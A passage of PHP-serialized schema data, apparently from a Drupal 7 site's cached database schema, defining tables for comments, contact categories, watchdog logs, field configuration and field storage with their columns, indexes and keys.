key\";a:1:{i:0;s:3:\"aid\";}s:7:\"indexes\";a:2:{s:4:\"path\";a:1:{i:0;s:4:\"path\";}s:9:\"timestamp\";a:1:{i:0;s:9:\"timestamp\";}}s:6:\"module\";s:13:\"adsense_click\";s:4:\"name\";s:14:\"adsense_clicks\";}s:7:\"comment\";a:6:{s:6:\"fields\";a:14:{s:3:\"cid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:3:\"pid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"nid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"subject\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"hostname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"changed\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}s:6:\"thread\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:4:\"name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:0;}s:4:\"mail\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:0;}s:8:\"homepage\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}}s:7:\"indexes\";a:5:{s:18:\"comment_status_pid\";a:2:{i:0;s:3:\"pid\";i:1;s:6:\"status\";}s:15:\"comment_num_new\";a:5:{i:0;s:3:\"nid\";i:1;s:6:\"status\";i:2;s:7:\"created\";i:3;s:3:\"cid\";i:4;s:6:\"thread\";}s:11:\"comment_uid\";a:1:{i:0;s:3:\"uid\";}s:20:\"comment_nid_language\";a:2:{i:0;s:3:\"nid\";i:1;s:8:\"language\";}s:15:\"comment_created\";a:1:{i:0;s:7:\"created\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:12:\"foreign keys\";a:2:{s:12:\"comment_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"comment_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:7:\"comment\";s:4:\"name\";s:7:\"comment\";}s:23:\"node_comment_statistics\";a:6:{s:6:\"fields\";a:6:{s:3:\"nid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:3:\"cid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:22:\"last_comment_timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:17:\"last_comment_name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:0;}s:16:\"last_comment_uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:13:\"comment_count\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"nid\";}s:7:\"indexes\";a:3:{s:22:\"node_comment_timestamp\";a:1:{i:0;s:22:\"last_comment_timestamp\";}s:13:\"comment_count\";a:1:{i:0;s:13:\"comment_count\";}s:16:\"last_comment_uid\";a:1:{i:0;s:16:\"last_comment_uid\";}}s:12:\"foreign keys\";a:2:{s:15:\"statistics_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:19:\"last_comment_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:16:\"last_comment_uid\";s:3:\"uid\";}}}s:6:\"module\";s:7:\"comment\";s:4:\"name\";s:23:\"node_comment_statistics\";}s:7:\"contact\";a:6:{s:6:\"fields\";a:6:{s:3:\"cid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"category\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:10:\"recipients\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:5:\"reply\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"selected\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:11:\"unique keys\";a:1:{s:8:\"category\";a:1:{i:0;s:8:\"category\";}}s:7:\"indexes\";a:1:{s:4:\"list\";a:2:{i:0;s:6:\"weight\";i:1;s:8:\"category\";}}s:6:\"module\";s:7:\"contact\";s:4:\"name\";s:7:\"contact\";}s:8:\"watchdog\";a:5:{s:6:\"fields\";a:11:{s:3:\"wid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:3:\"uid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"message\";a:3:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:9:\"variables\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;s:4:\"size\";s:3:\"big\";}s:8:\"severity\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:4:\"link\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:8:\"location\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:7:\"referer\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;}s:8:\"hostname\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"timestamp\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"wid\";}s:7:\"indexes\";a:3:{s:4:\"type\";a:1:{i:0;s:4:\"type\";}s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:8:\"severity\";a:1:{i:0;s:8:\"severity\";}}s:6:\"module\";s:5:\"dblog\";s:4:\"name\";s:8:\"watchdog\";}s:12:\"field_config\";a:5:{s:6:\"fields\";a:13:{s:2:\"id\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:10:\"field_name\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"active\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"storage_type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;}s:14:\"storage_module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"storage_active\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:1;s:9:\"serialize\";b:1;}s:11:\"cardinality\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"translatable\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:2:\"id\";}s:7:\"indexes\";a:8:{s:10:\"field_name\";a:1:{i:0;s:10:\"field_name\";}s:6:\"active\";a:1:{i:0;s:6:\"active\";}s:14:\"storage_active\";a:1:{i:0;s:14:\"storage_active\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:6:\"module\";a:1:{i:0;s:6:\"module\";}s:14:\"storage_module\";a:1:{i:0;s:14:\"storage_module\";}s:4:\"type\";a:1:{i:0;s:4:\"type\";}s:12:\"storage_type\";a:1:{i:0;s:12:\"storage_type\";}}s:6:\"module\";s:5:\"field\";s:4:\"name\";s:12:\"field_config\";}s:21:\"field_config_instance\";a:5:{s:6:\"fields\";a:7:{s:2:\"id\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:8:\"field_id\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;}s:10:\"field_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:1;s:9:\"serialize\";b:1;}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:2:\"id\";}s:7:\"indexes\";a:2:{s:17:\"field_name_bundle\";a:3:{i:0;s:10:\"field_name\";i:1;s:11:\"entity_type\";i:2;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}}s:6:\"module\";s:5:\"field\";s:4:\"name\";s:21:\"field_config_instance\";}s:11:\"cache_field\";a:5:{s:6:\"fields\";a:5:{s:3:\"cid\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:3:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";}s:6:\"expire\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"serialized\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:5:\"small\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:1:{s:6:\"expire\";a:1:{i:0;s:6:\"expire\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"cid\";}s:6:\"module\";s:5:\"field\";s:4:\"name\";s:11:\"cache_field\";}s:23:\"field_data_comment_body\";a:6:{s:6:\"fields\";a:9:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:18:\"comment_body_value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:19:\"comment_body_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:5:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:7:\"deleted\";i:3;s:5:\"delta\";i:4;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:19:\"comment_body_format\";a:1:{i:0;s:19:\"comment_body_format\";}}s:12:\"foreign keys\";a:1:{s:19:\"comment_body_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:19:\"comment_body_format\";s:6:\"format\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:23:\"field_data_comment_body\";}s:27:\"field_revision_comment_body\";a:6:{s:6:\"fields\";a:9:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:18:\"comment_body_value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:19:\"comment_body_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:6:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:11:\"revision_id\";i:3;s:7:\"deleted\";i:4;s:5:\"delta\";i:5;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:19:\"comment_body_format\";a:1:{i:0;s:19:\"comment_body_format\";}}s:12:\"foreign keys\";a:1:{s:19:\"comment_body_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:19:\"comment_body_format\";s:6:\"format\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:27:\"field_revision_comment_body\";}s:15:\"field_data_body\";a:6:{s:6:\"fields\";a:10:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:10:\"body_value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:12:\"body_summary\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:11:\"body_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:5:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:7:\"deleted\";i:3;s:5:\"delta\";i:4;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:11:\"body_format\";a:1:{i:0;s:11:\"body_format\";}}s:12:\"foreign keys\";a:1:{s:11:\"body_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:11:\"body_format\";s:6:\"format\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:15:\"field_data_body\";}s:19:\"field_revision_body\";a:6:{s:6:\"fields\";a:10:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:10:\"body_value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:12:\"body_summary\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:11:\"body_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:6:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:11:\"revision_id\";i:3;s:7:\"deleted\";i:4;s:5:\"delta\";i:5;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:11:\"body_format\";a:1:{i:0;s:11:\"body_format\";}}s:12:\"foreign keys\";a:1:{s:11:\"body_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:11:\"body_format\";s:6:\"format\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:19:\"field_revision_body\";}s:21:\"field_data_field_tags\";a:6:{s:6:\"fields\";a:8:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:14:\"field_tags_tid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:5:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:7:\"deleted\";i:3;s:5:\"delta\";i:4;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:14:\"field_tags_tid\";a:1:{i:0;s:14:\"field_tags_tid\";}}s:12:\"foreign keys\";a:1:{s:14:\"field_tags_tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:14:\"field_tags_tid\";s:3:\"tid\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:21:\"field_data_field_tags\";}s:25:\"field_revision_field_tags\";a:6:{s:6:\"fields\";a:8:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:14:\"field_tags_tid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}}s:11:\"primary key\";a:6:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:11:\"revision_id\";i:3;s:7:\"deleted\";i:4;s:5:\"delta\";i:5;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:14:\"field_tags_tid\";a:1:{i:0;s:14:\"field_tags_tid\";}}s:12:\"foreign keys\";a:1:{s:14:\"field_tags_tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:14:\"field_tags_tid\";s:3:\"tid\";}}}s:6:\"module\";s:17:\"field_sql_storage\";s:4:\"name\";s:25:\"field_revision_field_tags\";}s:22:\"field_data_field_image\";a:6:{s:6:\"fields\";a:12:{s:11:\"entity_type\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"bundle\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"deleted\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:9:\"entity_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:11:\"revision_id\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:15:\"field_image_fid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:8:\"unsigned\";b:1;}s:15:\"field_image_alt\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:512;s:8:\"not null\";b:0;}s:17:\"field_image_title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:1024;s:8:\"not null\";b:0;}s:17:\"field_image_width\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}s:18:\"field_image_height\";a:2:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}}s:11:\"primary key\";a:5:{i:0;s:11:\"entity_type\";i:1;s:9:\"entity_id\";i:2;s:7:\"deleted\";i:3;s:5:\"delta\";i:4;s:8:\"language\";}s:7:\"indexes\";a:7:{s:11:\"entity_type\";a:1:{i:0;s:11:\"entity_type\";}s:6:\"bundle\";a:1:{i:0;s:6:\"bundle\";}s:7:\"deleted\";a:1:{i:0;s:7:\"deleted\";}s:9:\"entity_id\";a:1:{i:0;s:9:\"entity_id\";}s:11:\"revision_id\";a:1:{i:0;s:11:\"revision_id\";}s:8:\"language\";a:1:{i:0;s:8:\"language\";}s:15:\"field_image_fid\";a:1:{i:0;s:15:\"field_image_fid\";}}s:12:\"foreign 